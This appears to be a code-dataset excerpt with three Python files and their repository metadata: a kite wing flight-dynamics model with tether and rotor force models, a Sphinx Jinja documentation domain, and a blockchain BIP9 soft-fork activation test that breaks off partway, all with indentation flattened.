wing_vel_g: Velocity of the wing in ground coordinates.
wing_pos_g: Position of the wing in ground coordinates.
"""
def Increment(self, tangent, step=1.0):
"""Return a state evolved from this state along a tangent direction.
Args:
tangent: A WingState.Tangent along which to move.
step: A scaling of how far to move.
Returns:
A new WingState.
"""
return WingState(omega_b=self.omega_b + step * tangent.domega_b,
dcm_g2b=(geometry.AxisToDcm(step * tangent.ddcm_g2b)
* self.dcm_g2b),
wing_vel_g=self.wing_vel_g + step * tangent.dwing_vel_g,
wing_pos_g=self.wing_pos_g + step * tangent.dwing_pos_g)
def Difference(self, other_state):
"""Inverse operation of Increment with a step size of 1.0."""
return WingState.Tangent(
domega_b=other_state.omega_b - self.omega_b,
ddcm_g2b=geometry.DcmToAxis(other_state.dcm_g2b * self.dcm_g2b.T),
dwing_vel_g=other_state.wing_vel_g - self.wing_vel_g,
dwing_pos_g=other_state.wing_pos_g - self.wing_pos_g)
@type_util.RequireMatrixArguments(None, (3, 1))
def CalcAerodynamicAngles(self, wind_g):
"""Calculates (v_rel, alpha, beta) from the current wing state.
Args:
wind_g: A 3-by-1 matrix storing the wind in g coordinates.
Returns:
A tuple (v_rel, alpha, beta).
"""
return geometry.VelocitiesToAerodynamicAngles(
self.dcm_g2b, self.wing_vel_g, wind_g)
@type_util.RequireMatrixArguments((3, 1), (3, 2), None, None)
def _CalcBridleKnotPos(tether_force_b, bridle_pos, bridle_y_offset,
bridle_radius):
"""Calculate the bridle knot position in body coordinates."""
if np.linalg.norm(tether_force_b) == 0.0:
tether_force_b = np.matrix([[0.0], [0.0], [1.0]])
# Calculate the knot point location. Here we use a bridle
# coordinate system with its origin at the bridle pivot, its
# y-axis pointing toward the starboard bridle point and its z-axis
# pointed at the knot.
bridle_coord_y = bridle_pos[:, 1] - bridle_pos[:, 0]
bridle_coord_y /= np.linalg.norm(bridle_coord_y)
bridle_coord_z = copy.copy(tether_force_b)
bridle_coord_z -= bridle_coord_y * (np.transpose(bridle_coord_y)
* tether_force_b)
bridle_coord_z /= np.linalg.norm(bridle_coord_z)
bridle_coord_origin = (bridle_pos[:, 1] + bridle_pos[:, 0]) * 0.5
bridle_coord_origin[1] += bridle_y_offset
return bridle_coord_origin + bridle_coord_z * bridle_radius
class MotorModel(object):
# pylint: disable=unused-argument
def CalcMotorForceMomentPos(self, v_rel, alpha, beta, omega_b,
thrust, motor_moment_r):
raise NotImplementedError()
class PureForceMomentMotorModel(MotorModel):
def __init__(self, rotor_params, pos_com_b):
self._dcm_r2b = geometry.AngleToDcm(
0.0, np.arctan2(rotor_params[0]['axis'][2],
rotor_params[0]['axis'][0]), 0.0)
self._pos_com_b = np.matrix(pos_com_b).T
# pylint: disable=unused-argument
@type_util.RequireMatrixArguments(None, None, None, None, (3, 1), (1, 1),
(3, 1))
def CalcMotorForceMomentPos(self, v_rel, alpha, beta, omega_b,
thrust, motor_moment_r):
# NOTE: This neglects motor reaction torques, and assumes that
# MixRotors cancels the non-zero torque about the center-of-mass
# that results from pure thrusting.
motor_force_r = np.matrix([[thrust[0, 0]], [0.0], [0.0]])
return ForceMomentPos(
self._dcm_r2b * motor_force_r, self._dcm_r2b * motor_moment_r,
self._pos_com_b)
class MotorMixerMotorModel(MotorModel):
"""Model the commanded thrust and moment by calling MixRotors."""
def __init__(self, rotor_databases, air_density, weights, rotor_params,
rotor_control_params, hover_flight_mode=False):
self._dcm_r2b = geometry.AngleToDcm(
0.0, np.arctan2(rotor_params[0]['axis'][2],
rotor_params[0]['axis'][0]), 0.0)
self._rotor_databases = rotor_databases
self._air_density = air_density
self._weights = weights
self._rotor_params = rotor_params
self._rotor_control_params = rotor_control_params
self._hover_flight_mode = hover_flight_mode
@type_util.RequireMatrixArguments(None, None, (3, 1), (1, 1), (3, 1))
def CalcRotorSpeeds(self, v_rel, omega_b, thrust, motor_moment_r):
thrust_moment = {
'thrust': thrust[0, 0],
'moment': [motor_moment_r[i, 0] for i in range(3)]
}
return actuator_util.MixRotors(
thrust_moment, self._weights, v_rel, [omega_b[i, 0] for i in range(3)],
control_types.kStackingStateNormal, self._hover_flight_mode,
self._air_density, self._rotor_params, self._rotor_control_params)
@type_util.RequireMatrixArguments(None, None, None, None, (3, 1), (1, 1),
(3, 1))
def CalcMotorForceMomentPos(self, v_rel, alpha, beta, omega_b,
thrust, motor_moment_r):
rotor_speeds = self.CalcRotorSpeeds(v_rel, omega_b, thrust, motor_moment_r)
total_force = np.matrix(np.zeros((3, 1)))
total_moment = np.matrix(np.zeros((3, 1)))
v_rel_b = geometry.AerodynamicAnglesToRelativeVelocity(v_rel, alpha, beta)
for i in range(rotor_speeds.shape[0]):
rotor_speed = rotor_speeds[i, 0]
if self._rotor_params[i]['dir'] == system_types.kPositiveX:
direction = 1.0
else:
direction = -1.0
rotor_velocity = direction * rotor_speed
rotor_pos_b = np.matrix(self._rotor_params[i]['pos']).T
v_freestream = np.dot(
self._dcm_r2b[:, 0].T, v_rel_b + np.cross(omega_b.T, rotor_pos_b.T).T)
v_freestream *= (1.0 - self._rotor_params[i]['local_pressure_coeff'])**0.5
rotor_thrust = self._rotor_databases[i].CalcThrust(
rotor_speed, v_freestream[0, 0], self._air_density)
rotor_torque = direction * self._rotor_databases[i].CalcTorque(
rotor_speed, v_freestream[0, 0], self._air_density)
motor_force_b = self._dcm_r2b * np.matrix([[rotor_thrust], [0.0], [0.0]])
lever_arm_moment_b = np.cross(
rotor_pos_b.T, motor_force_b.T).T
aero_moment_b = self._dcm_r2b * np.matrix([[rotor_torque], [0.0], [0.0]])
gyro_moment_b = np.cross(
self._rotor_params[i]['I'] * rotor_velocity * self._dcm_r2b[:, 0].T,
omega_b.T).T
total_force += motor_force_b
total_moment += lever_arm_moment_b + aero_moment_b + gyro_moment_b
return ForceMomentPos(
total_force, total_moment, np.matrix(np.zeros((3, 1))))
class TetherForceModel(object):
# pylint: disable=unused-argument
def CalcBodyForce(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
raise NotImplementedError()
class ConstantTetherForceModel(TetherForceModel):
"""Simple model of tether force as constant in ground coordinates."""
def __init__(self, force_g):
self.SetForce(force_g)
# pylint: disable=unused-argument
@type_util.RequireMatrixArguments(None, (3, 3), (3, 1), (3, 1), (3, 1))
def CalcBodyForce(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
"""Calculate the tether force in body coordinates.
Args:
dcm_g2b: DCM rotating ground to body coordinates (3-by-3 np.matrix).
wing_pos_g: Wing positon [m] in ground coordinates (unused
3-by-1 np.matrix).
wing_vel_g: Wing velocity [m/s] in ground coordinates (unused
3-by-1 np.matrix).
wind_g: Wind velocity [m/s] in ground coordinates (unused 3-by-1
np.matrix).
Returns:
A 3-by-1 np.matrix storing the tether force in body coordinates.
"""
return dcm_g2b * self._force_g
@type_util.RequireMatrixArguments(None, (3, 1))
def SetForce(self, force_g):
"""Update the force vector.
Args:
force_g: New tether force in ground coordinates.
"""
self._force_g = copy.copy(force_g)
class SimpleSpringTetherForceModel(TetherForceModel):
"""Model of tether force as a simple spring, including bridle interactions."""
def __init__(self, spring_const, system_params):
tether_params = system_params['tether']
wing_params = system_params['wing']
self._spring_const = spring_const
self._tether_length = tether_params['length']
self._tether_drag_area = (0.25 * tether_params['section_drag_coeff']
* tether_params['length']
* tether_params['outer_diameter'])
self._air_density = system_params['phys']['rho']
self._bridle_pos = np.matrix(wing_params['bridle_pos']).T
self._bridle_y_offset = wing_params['bridle_y_offset']
self._bridle_radius = wing_params['bridle_rad']
# pylint: disable=unused-argument
@type_util.RequireMatrixArguments(None, (3, 3), (3, 1), (3, 1), (3, 1))
def CalcBodyForce(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
"""Calculate the tether force in body coordinates.
Args:
dcm_g2b: DCM rotating ground to body coordinates (3-by-3 np.matrix).
wing_pos_g: Wing positon [m] in ground coordinates (3-by-1 np.matrix).
wing_vel_g: Wing velocity [m/s] in ground coordinates (3-by-1 np.matrix).
wind_g: Wind velocity [m/s] in ground coordinates (3-by-1 np.matrix).
Returns:
A 3-by-1 np.matrix storing the tether force in body coordinates.
"""
# This intentionally ignores the small offset from the GSG
# position for simplicity.
bridle_knot_b = _CalcBridleKnotPos(dcm_g2b * -wing_pos_g,
self._bridle_pos,
self._bridle_y_offset,
self._bridle_radius)
bridle_knot_g = wing_pos_g + dcm_g2b.T * bridle_knot_b
tension = self._spring_const * (np.linalg.norm(bridle_knot_g)
- self._tether_length)
spring_force_g = -tension * bridle_knot_g / np.linalg.norm(bridle_knot_g)
airspeed = np.linalg.norm(wing_vel_g - wind_g)
drag = 0.5 * self._air_density * airspeed**2.0 * self._tether_drag_area
drag_force_g = drag * (wind_g - wing_vel_g) / max(airspeed, 0.1)
return dcm_g2b * (spring_force_g + drag_force_g)
class CatenaryTetherForceModel(TetherForceModel):
"""Model of tether force using catenary tension and rigid-rod drag."""
def __init__(self, tether_params, gsg_pos_g, bridle_radius, g, air_density):
"""Create a catenary tether force model.
Args:
tether_params: TetherParams dictionary.
gsg_pos_g: Position [m] of the GSG in the g-frame.
bridle_radius: Bridle radius [m] of the kite.
g: Gravitational acceleration [m/s^2].
air_density: Air density [kg/m^3].
"""
self._gsg_pos_g = np.matrix(np.reshape(gsg_pos_g, (3, 1)))
self._length = tether_params['length'] + bridle_radius
self._weight = tether_params['length'] * tether_params['linear_density'] * g
self._section_drag_coeff = tether_params['section_drag_coeff']
self._outer_diameter = tether_params['outer_diameter']
self._air_density = air_density
# pylint: disable=unused-argument
@type_util.RequireMatrixArguments(None, (3, 3), (3, 1), (3, 1), (3, 1))
def CalcBodyForce(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
"""Calculate the tether force in body coordinates.
Args:
dcm_g2b: DCM rotating ground to body coordinates (3-by-3 np.matrix).
wing_pos_g: Wing positon [m] in ground coordinates (3-by-1 np.matrix).
wing_vel_g: Wing velocity [m/s] in ground coordinates (3-by-1 np.matrix).
wind_g: Wind velocity [m/s] in ground coordinates (unused 3-by-1
np.matrix).
Returns:
A 3-by-1 np.matrix storing the tether force in body coordinates.
"""
# Calculate catenary tension.
horizontal_distance = (wing_pos_g[0, 0]**2.0 + wing_pos_g[1, 0]**2.0)**0.5
vertical_distance = self._gsg_pos_g[2, 0] - wing_pos_g[2, 0]
(h, v) = catenary.DimensionlessTensionsFromPoint(
horizontal_distance / self._length,
vertical_distance / self._length)
azi = np.arctan2(wing_pos_g[1, 0], wing_pos_g[0, 0])
tension_g = self._weight * np.matrix(
[[-h * np.cos(azi)], [-h * np.sin(azi)], [v]])
# Calculate drag reaction force on the wing. This is calculated by modeling
# the tether as a rigid rod that is pinned at the GSG and rotating at fixed
# angular velocity.
#
# Let
# CD = cross-sectional drag coefficient
# s = diameter of the rod
# L = length of rod
# V = velocity of the free end of the rod
# rho = air density
# The drag dD along a segment of the rod with length dx at distance x from
# the fixed end is
# dD(x) = 1/2 * rho * v(x)^2 * CD * s * dx.
# Therefore,
# dD/dx = 1/2 * rho * v(x)^2 * CD * s.
# The velocity of the segment is v(x) = x/L * V, so
# dD/dx = 1/2 * rho * x^2 / L^2 * V^2 * CD * s
# From this, we obtain the differential moment about the fixed end:
# dM/dx = x * dD/dx = 1/2 * rho * x^3 / L^2 * V^2 * CD * s.
# Integrating from x=0 to x=L yields the total moment due to drag,
# M = 1/8 * rho * L^2 * V^2 * CD * s.
# Force at the fixed end induces no moment, so the drag moment must be
# entirely balanced by a reaction force at the free end (i.e. the kite).
# The magnitude of this force, R, is
# R = M / L = 1/8 * rho * L * V^2 * CD * s.
#
# Here, we treat the rod as extending from the GSG to the body frame origin,
# and we use the wing velocity normal to the rod to determine V.
gsg_to_wing_g = wing_pos_g - self._gsg_pos_g
gsg_to_wing_dir_g = gsg_to_wing_g / np.linalg.norm(gsg_to_wing_g)
normal_vel_g = (wing_vel_g
- float(wing_vel_g.T * gsg_to_wing_dir_g)
* gsg_to_wing_dir_g)
normal_vel_mag = np.linalg.norm(normal_vel_g)
drag_direction_g = -normal_vel_g / normal_vel_mag
drag_g = (1.0 / 8.0 * self._air_density * np.linalg.norm(gsg_to_wing_g)
* normal_vel_mag**2.0 * self._section_drag_coeff
* self._outer_diameter * drag_direction_g)
return dcm_g2b * (tension_g + drag_g)
class SwigAeroModel(object):
"""Swig import of the simulator aerodynamics model."""
def __init__(self):
self._aero = physics.Aero(physics.GetAeroSimParams())
@type_util.RequireMatrixArguments(None, None, None, None,
(system_types.kNumFlaps, 1), (3, 1),
None)
def CalcFMCoeff(self, alpha, beta, reynolds_number, flaps, omega_hat,
thrust_coeff):
"""Calculates force and moment coefficients from the Swig database."""
omega_hat_vec3 = physics.Vec3()
omega_hat_vec3.x = omega_hat[0, 0]
omega_hat_vec3.y = omega_hat[1, 0]
omega_hat_vec3.z = omega_hat[2, 0]
flaps_vec = physics.VecWrapper(system_types.kNumFlaps)
for i in range(system_types.kNumFlaps):
flaps_vec.SetValue(i, flaps[i, 0])
force_moment = physics.ForceMoment()
self._aero.CalcForceMomentCoeff(alpha, beta, omega_hat_vec3.this,
flaps_vec.GetVec(), reynolds_number,
force_moment.this, thrust_coeff)
force_moment_coeff = (np.matrix([[force_moment.force.x],
[force_moment.force.y],
[force_moment.force.z]]),
np.matrix([[force_moment.moment.x],
[force_moment.moment.y],
[force_moment.moment.z]]))
return force_moment_coeff
class Wing(object):
"""Simplified model of the wing for control design.
The Wing class stores parameters defined by the environment (air
density, gravitational constant), a stateless tether force model,
a stateless aerodynamic model, and a nominal orientation.
It provides functions for calculating the ODEs that govern a 6-DOF
rigid body model.
"""
def __init__(self, system_params, sim_params, aero_model, motor_model,
tether_force_model):
"""Constructs a Wing model.
Args:
system_params: A system parameters structure from mconfig.
sim_params: A simulator parameters structure from mconfig.
aero_model: A Python class implementing a function CalcFMCoeff. See
SwigAeroModel in this module as an example.
motor_model: A MotorModel.
tether_force_model: A TetherForceModel.
"""
self._wing_area = system_params['wing']['A']
self._wing_span = system_params['wing']['b']
self._wing_chord = system_params['wing']['c']
self._wing_mass = system_params['wing']['m']
self._wing_inertia_matrix = np.matrix(system_params['wing']['I']['d'])
self._pos_com_b = np.matrix(system_params['wing']['center_of_mass_pos']).T
# Bridle parameters.
self._bridle_pos = np.matrix(system_params['wing']['bridle_pos']).T
self._bridle_y_offset = system_params['wing']['bridle_y_offset']
self._bridle_radius = system_params['wing']['bridle_rad']
# Physics parameters.
self._g_g = np.matrix([[0.0], [0.0], [system_params['phys']['g']]])
self._air_density = system_params['phys']['rho']
self._dynamic_viscosity = sim_params['phys_sim']['dynamic_viscosity']
self._aero_model = aero_model
self._motor_model = motor_model
self._tether_force_model = tether_force_model
@type_util.RequireMatrixArguments(None, (3, 3))
def _CalcGravityForceMomentPos(self, dcm_g2b):
return ForceMomentPos(dcm_g2b * (self._wing_mass * self._g_g),
np.matrix(np.zeros((3, 1))), self._pos_com_b)
@type_util.RequireMatrixArguments(None, None, None, None, (3, 1), (1, 1),
(3, 1))
def _CalcMotorForceMomentPos(self, v_rel, alpha, beta, omega_b,
thrust, motor_moment):
"""Calculates the motor forces and moments."""
return self._motor_model.CalcMotorForceMomentPos(
v_rel, alpha, beta, omega_b, thrust, motor_moment)
@type_util.RequireMatrixArguments(None, (3, 3), (3, 1), (3, 1), (3, 1))
def _CalcTetherForceMomentPos(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
tether_force_b = self._tether_force_model.CalcBodyForce(dcm_g2b, wing_pos_g,
wing_vel_g, wind_g)
return ForceMomentPos(tether_force_b, np.matrix(np.zeros((3, 1))),
_CalcBridleKnotPos(tether_force_b, self._bridle_pos,
self._bridle_y_offset,
self._bridle_radius))
def CalcTetherForceG(self, state, inputs):
return state.dcm_g2b.T * self._tether_force_model.CalcBodyForce(
state.dcm_g2b, state.wing_pos_g, state.wing_vel_g, inputs.wind_g)
def CalcTetherTensionRollPitch(self, state, inputs):
tether_force_b = self._tether_force_model.CalcBodyForce(
state.dcm_g2b, state.wing_pos_g, state.wing_vel_g, inputs.wind_g)
return geometry.TetherForceCartToSph(tether_force_b)
@type_util.RequireMatrixArguments(None, None, None, None, (3, 1),
(system_types.kNumFlaps, 1), None)
def CalcAeroForceMomentPos(self, v_rel, alpha, beta, omega_b, flaps,
thrust_coeff):
"""Calculate the aerodynamic force and moments on the wing.
Args:
v_rel: Airspeed [m/s].
alpha: Angle-of-attack [rad].
beta: Angle-of-sideslip [rad].
omega_b: Wing body-rates [rad/s] (3-by-1 np.matrix).
flaps: Flap deflections (kNumFlaps-by-1 np.matrix).
thrust_coeff: Thrust coefficient [#] using wind turbine convention.
Returns:
(ForceMomentPos in body coordinates, force coeffs., moment coeffs.)
"""
reynolds_number = ((v_rel * self._wing_chord * self._air_density)
/ self._dynamic_viscosity)
dynamic_pressure = 0.5 * self._air_density * v_rel**2.0
length_scale = np.matrix([[self._wing_span],
[self._wing_chord],
[self._wing_span]])
omega_hat = np.multiply(omega_b, length_scale) / (2.0 * v_rel)
(cf, cm) = self._aero_model.CalcFMCoeff(alpha, beta, reynolds_number,
flaps, omega_hat, thrust_coeff)
return (ForceMomentPos(dynamic_pressure * self._wing_area * cf,
(dynamic_pressure * self._wing_area
* np.multiply(length_scale, cm)),
np.matrix(np.zeros((3, 1)))),
cf, cm)
def _BodyForceMomentPosToComForceMoment(self, force_moment_pos_list):
force = np.matrix(np.zeros((3, 1)))
moment = np.matrix(np.zeros((3, 1)))
for force_moment_pos in force_moment_pos_list:
force += force_moment_pos.force
moment += force_moment_pos.moment
moment += np.cross(force_moment_pos.pos - self._pos_com_b,
force_moment_pos.force, axis=0)
return ForceMoment(force, moment)
def CalcDeriv(self, state, inputs):
"""Calculates the derivative of the wing state vector.
Args:
state: A WingState.
inputs: A WingInputs.
Returns:
A WingState.Tangent containing the derivative of the state.
"""
euler_moment = np.cross(self._wing_inertia_matrix * state.omega_b,
state.omega_b, axis=0)
v_rel, alpha, beta = state.CalcAerodynamicAngles(inputs.wind_g)
# Fixing total thrust coefficient to 0.0 for this application.
# NOTE: By accounting for the rotor wake effect on the tail,
# we found that the synthesized gains yield worse flight quality than when
# the effect is ignored (see b/110491871 for details).
thrust_coeff = 0.0
aero_force_moment_pos, _, _ = self.CalcAeroForceMomentPos(
v_rel, alpha, beta, state.omega_b, inputs.flaps, thrust_coeff)
force_moment_com = self._BodyForceMomentPosToComForceMoment([
self._CalcGravityForceMomentPos(state.dcm_g2b),
self._CalcMotorForceMomentPos(
v_rel, alpha, beta, state.omega_b, inputs.thrust,
inputs.motor_moment),
self._CalcTetherForceMomentPos(state.dcm_g2b, state.wing_pos_g,
state.wing_vel_g, inputs.wind_g),
aero_force_moment_pos,
ForceMomentPos(np.matrix(np.zeros((3, 1))), euler_moment,
np.matrix(np.zeros((3, 1))))
])
# Calculate center-of-mass acceleration.
accel_com_g = (state.dcm_g2b.T * force_moment_com.force) / self._wing_mass
# Calculate body angular acceleration.
omega_b_dot = np.matrix(np.linalg.solve(self._wing_inertia_matrix,
force_moment_com.moment))
wing_accel_g = accel_com_g - state.dcm_g2b.T * (
np.cross(state.omega_b,
np.cross(state.omega_b, self._pos_com_b, axis=0), axis=0)
+ np.cross(omega_b_dot, self._pos_com_b, axis=0))
return WingState.Tangent(domega_b=omega_b_dot, ddcm_g2b=state.omega_b,
dwing_vel_g=wing_accel_g,
dwing_pos_g=state.wing_vel_g)
def CalcDVbCom(self, state, state_dot):
"""Calculates the rate of change of Vb for unit tests."""
return (state.dcm_g2b * state_dot.dwing_vel_g
- np.cross(state.omega_b, state.dcm_g2b * state.wing_vel_g, axis=0)
+ np.cross(state_dot.domega_b, self._pos_com_b, axis=0))
def CalcEnergy(self, state):
"""Calculates energy of the rigid body model for unit tests."""
wing_com_pos_g = state.wing_pos_g + state.dcm_g2b.T * self._pos_com_b
wing_com_vel_g = (state.wing_vel_g
+ (state.dcm_g2b.T
* np.cross(state.omega_b, self._pos_com_b, axis=0)))
return ((0.5 * np.transpose(state.omega_b)
* self._wing_inertia_matrix * state.omega_b)
+ (0.5 * self._wing_mass * np.transpose(wing_com_vel_g)
* wing_com_vel_g)
- self._wing_mass * np.transpose(self._g_g) * wing_com_pos_g)[0, 0]
def CalcLinearization(f, state, inputs, state_step_sizes, input_step_sizes):
"""Calculate the system matrices for the Wing model.
Produces a linearized model:
f(x + dx, u + du) ~ f(x) + A * dx + B * du
where f is an arbitrary function, x is the wing state and u are
the wing inputs.
Args:
f: A function mapping an n-by-1 np.matrix and an m-by-1 np.matrix to
a n-by-1 np.matrix.
state: An instance of a state class from type_util.
inputs: An instance of a named vector from type_util.
state_step_sizes: A vector of step sizes for the state.
input_step_sizes: A vector of step sizes for the inputs.
Returns:
A tuple (A, B) where A and B are both of type np.matrix.
"""
num_states = state.Tangent.GetDim()
num_inputs = inputs.GetDim()
num_outputs = f(state, inputs).shape[0]
dfdx = np.matrix(np.zeros((num_outputs, num_states)))
dfdu = np.matrix(np.zeros((num_outputs, num_inputs)))
for i in range(num_states):
h = state_step_sizes[i, 0]
e = state.Tangent.FromVector(np.matrix([
[1.0 if j == i else 0.0] for j in range(num_states)]))
dfdx[:, i] = (f(state.Increment(e, step=h), inputs)
- f(state.Increment(e, step=-h), inputs)) / (2.0 * h)
for i in range(num_inputs):
h = input_step_sizes[i, 0]
e = np.matrix([[1.0 if j == i else 0.0] for j in range(num_inputs)])
dfdu[:, i] = (
f(state, inputs.FromVector(inputs.ToVector() + h * e))
- f(state, inputs.FromVector(inputs.ToVector() - h * e))) / (2.0 * h)
return (dfdx, dfdu)
| apache-2.0 | -7,089,321,281,316,663,000 | 41.222057 | 80 | 0.614592 | false |
offlinehacker/sphinxcontrib.jinjadomain | sphinxcontrib/jinjadomain.py | 1 | 3445 | """
sphinxcontrib.jinjadomain
~~~~~~~~~~~~~~~~~~~~~~~~
The jinja domain for documenting jinja templates.
:copyright: Copyright 2012 by Jaka Hudoklin
:license: BSD, see LICENSE for details.
"""
import re
import os
from sphinx import addnodes
from sphinx.domains import Domain, ObjType, Index
from sphinx.directives import ObjectDescription
from sphinx.util.docfields import GroupedField, TypedField
def jinja_resource_anchor(method, path):
path = re.sub(r'[<>:/]', '-', path)
return method.lower() + '-' + path
class JinjaResource(ObjectDescription):
doc_field_types = [
TypedField('parameter', label='Parameters',
names=('param', 'parameter', 'arg', 'argument'),
typerolename='obj', typenames=('paramtype', 'type')),
]
method = "template"
def handle_signature(self, sig, signode):
method = self.method.upper() + ' '
signode += addnodes.desc_name(method, method)
signode += addnodes.desc_name(sig, sig)
fullname = "Template" + ' ' + sig
signode['method'] = self.method
signode['path'] = sig
signode['fullname'] = fullname
return (fullname, self.method, sig)
def needs_arglist(self):
return False
def add_target_and_index(self, name_cls, sig, signode):
signode['ids'].append(jinja_resource_anchor(*name_cls[1:]))
self.env.domaindata['jinja'][self.method][sig] = (self.env.docname, '')
def get_index_text(self, modname, name):
return ''
class JinjaIndex(Index):
name = 'jinjatemplates'
localname = 'templates'
shortname = 'templates'
def __init__(self, *args, **kwargs):
super(JinjaIndex, self).__init__(*args, **kwargs)
def grouping_prefix(self, path):
return os.path.split(path)[0]
def generate(self, docnames=None):
content = {}
items = ((method, path, info)
for method, routes in self.domain.routes.iteritems()
for path, info in routes.iteritems())
items = sorted(items, key=lambda item: item[1])
for method, path, info in items:
entries = content.setdefault(self.grouping_prefix(path), [])
entries.append([
path, 0, info[0],
jinja_resource_anchor(method, path), '', '', info[1]
])
content = content.items()
content.sort(key=lambda (k, v): k)
return (content, True)
class JinjaDomain(Domain):
"""Jinja domain."""
name = 'jinja'
label = 'jinja'
object_types = {
'template': ObjType('template', 'template', 'obj'),
}
directives = {
'template': JinjaResource,
}
initial_data = {
'template': {}, # path: (docname, synopsis)
}
indices = [JinjaIndex]
@property
def routes(self):
return dict((key, self.data[key]) for key in self.object_types)
def clear_doc(self, docname):
for typ, routes in self.routes.iteritems():
for path, info in routes.items():
if info[0] == docname:
del routes[path]
def get_objects(self):
for method, routes in self.routes.iteritems():
for path, info in routes.iteritems():
anchor = jinja_resource_anchor(method, path)
yield (path, path, method, info[0], anchor, 1)
def setup(app):
app.add_domain(JinjaDomain)
| bsd-2-clause | 4,406,314,289,829,284,400 | 27.708333 | 79 | 0.584906 | false |
deuscoin-org/deuscoin-core | qa/rpc-tests/bip9-softforks.py | 1 | 8792 | #!/usr/bin/env python2
# Copyright (c) 2015 The Deuscoin Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, NetworkThread
from test_framework.blocktools import create_coinbase, create_block
from test_framework.comptool import TestInstance, TestManager
from test_framework.script import CScript, OP_1NEGATE, OP_NOP3, OP_DROP
from binascii import hexlify, unhexlify
import cStringIO
import time
import itertools
'''
This test is meant to exercise BIP forks
Connect to a single node.
regtest lock-in with 108/144 block signalling
activation after a further 144 blocks
mine 2 block and save coinbases for later use
mine 141 blocks to transition from DEFINED to STARTED
mine 100 blocks signalling readiness and 44 not in order to fail to change state this period
mine 108 blocks signalling readiness and 36 blocks not signalling readiness (STARTED->LOCKED_IN)
mine a further 143 blocks (LOCKED_IN)
test that enforcement has not triggered (which triggers ACTIVE)
test that enforcement has triggered
'''
class BIP9SoftForksTest(ComparisonTestFramework):
def __init__(self):
self.num_nodes = 1
def setup_network(self):
self.nodes = start_nodes(1, self.options.tmpdir,
extra_args=[['-debug', '-whitelist=127.0.0.1']],
binary=[self.options.testbinary])
def run_test(self):
self.test = TestManager(self, self.options.tmpdir)
self.test.add_all_connections(self.nodes)
NetworkThread().start() # Start up network handling in another thread
self.test.run()
def create_transaction(self, node, coinbase, to_address, amount):
from_txid = node.getblock(coinbase)['tx'][0]
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
tx = CTransaction()
f = cStringIO.StringIO(unhexlify(rawtx))
tx.deserialize(f)
tx.nVersion = 2
return tx
def sign_transaction(self, node, tx):
signresult = node.signrawtransaction(hexlify(tx.serialize()))
tx = CTransaction()
f = cStringIO.StringIO(unhexlify(signresult['hex']))
tx.deserialize(f)
return tx
def generate_blocks(self, number, version, test_blocks = []):
for i in xrange(number):
block = create_block(self.tip, create_coinbase(self.height), self.last_block_time + 1)
block.nVersion = version
block.rehash()
block.solve()
test_blocks.append([block, True])
self.last_block_time += 1
self.tip = block.sha256
self.height += 1
return test_blocks
def get_bip9_status(self, key):
info = self.nodes[0].getblockchaininfo()
for row in info['bip9_softforks']:
if row['id'] == key:
return row
raise IndexError ('key:"%s" not found' % key)
def test_BIP(self, bipName, activated_version, invalidate, invalidatePostSignature):
# generate some coins for later
self.coinbase_blocks = self.nodes[0].generate(2)
self.height = 3 # height of the next block to build
self.tip = int ("0x" + self.nodes[0].getbestblockhash() + "L", 0)
self.nodeaddress = self.nodes[0].getnewaddress()
self.last_block_time = int(time.time())
assert_equal(self.get_bip9_status(bipName)['status'], 'defined')
# Test 1
# Advance from DEFINED to STARTED
test_blocks = self.generate_blocks(141, 4)
yield TestInstance(test_blocks, sync_every_block=False)
assert_equal(self.get_bip9_status(bipName)['status'], 'started')
# Test 2
# Fail to achieve LOCKED_IN 100 out of 144 signal bit 1
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(50, activated_version) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(20, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, activated_version, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(24, 4, test_blocks) # 0x20010000 (signalling not)
yield TestInstance(test_blocks, sync_every_block=False)
assert_equal(self.get_bip9_status(bipName)['status'], 'started')
# Test 3
# 108 out of 144 signal bit 1 to achieve LOCKED_IN
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(58, activated_version) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(26, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, activated_version, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(10, 4, test_blocks) # 0x20010000 (signalling not)
yield TestInstance(test_blocks, sync_every_block=False)
assert_equal(self.get_bip9_status(bipName)['status'], 'locked_in')
# Test 4
# 143 more version 536870913 blocks (waiting period-1)
test_blocks = self.generate_blocks(143, 4)
yield TestInstance(test_blocks, sync_every_block=False)
assert_equal(self.get_bip9_status(bipName)['status'], 'locked_in')
# Test 5
# Check that the new rule is enforced
spendtx = self.create_transaction(self.nodes[0],
self.coinbase_blocks[0], self.nodeaddress, 1.0)
invalidate(spendtx)
spendtx = self.sign_transaction(self.nodes[0], spendtx)
spendtx.rehash()
invalidatePostSignature(spendtx)
spendtx.rehash()
block = create_block(self.tip, create_coinbase(self.height), self.last_block_time + 1)
block.nVersion = activated_version
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.last_block_time += 1
self.tip = block.sha256
self.height += 1
yield TestInstance([[block, True]])
assert_equal(self.get_bip9_status(bipName)['status'], 'active')
# Test 6
# Check that the new sequence lock rules are enforced
spendtx = self.create_transaction(self.nodes[0],
self.coinbase_blocks[1], self.nodeaddress, 1.0)
invalidate(spendtx)
spendtx = self.sign_transaction(self.nodes[0], spendtx)
spendtx.rehash()
invalidatePostSignature(spendtx)
spendtx.rehash()
block = create_block(self.tip, create_coinbase(self.height), self.last_block_time + 1)
block.nVersion = 5
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.last_block_time += 1
yield TestInstance([[block, False]])
# Restart all
